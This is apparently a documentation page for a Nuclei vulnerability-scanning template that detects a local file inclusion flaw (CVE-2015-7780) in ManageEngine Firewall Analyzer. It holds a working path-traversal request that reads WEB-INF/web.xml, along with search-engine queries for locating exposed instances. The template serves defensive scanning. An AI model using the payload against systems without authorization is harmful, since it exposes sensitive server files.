ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
ID: CVE-2015-7780
Severity: medium
Author: daffainfo
Tags: cve2015,cve,manageengine,edb,lfi,zohocorp
Description
Section titled “Description”ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
YAML Source
Section titled “YAML Source”id: CVE-2015-7780
info: name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion author: daffainfo severity: medium description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/35933 - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html - http://jvn.jp/en/jp/JVN21968837/index.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7780 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 epss-percentile: 0.51315 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp product: manageengine_firewall_analyzer shodan-query: http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" tags: cve2015,cve,manageengine,edb,lfi,zohocorp
http: - method: GET path: - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
matchers-condition: and matchers: - type: word part: body words: - "</web-app>" - "java.sun.com" condition: and
- type: word part: header words: - "application/xml"
- type: status status: - 200# digest: 4b0a00483046022100ef61c56cecb32b8eb3165fb441a666e1d5597f1d7cf9f33613cb0c57f01c902c022100c914e400f6fcd103d90c63dbb0fb41e5e590c3ba6b0c76a354533ccaec64446d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-7780.yaml"